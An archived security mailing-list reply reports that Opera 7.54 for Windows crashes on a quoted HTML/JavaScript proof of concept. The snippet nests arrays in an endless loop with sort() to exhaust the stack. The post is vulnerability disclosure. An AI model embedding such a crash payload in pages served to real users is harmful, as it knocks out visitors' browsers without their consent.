lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: sergio at forzis.com (sergio@...zis.com)
Subject: Re: Opera flaws: nested array sort() loop Stack overflow exception

Opera Browser (v7.54 for Windows) crashes as well with mentioned code:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
</HTML>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ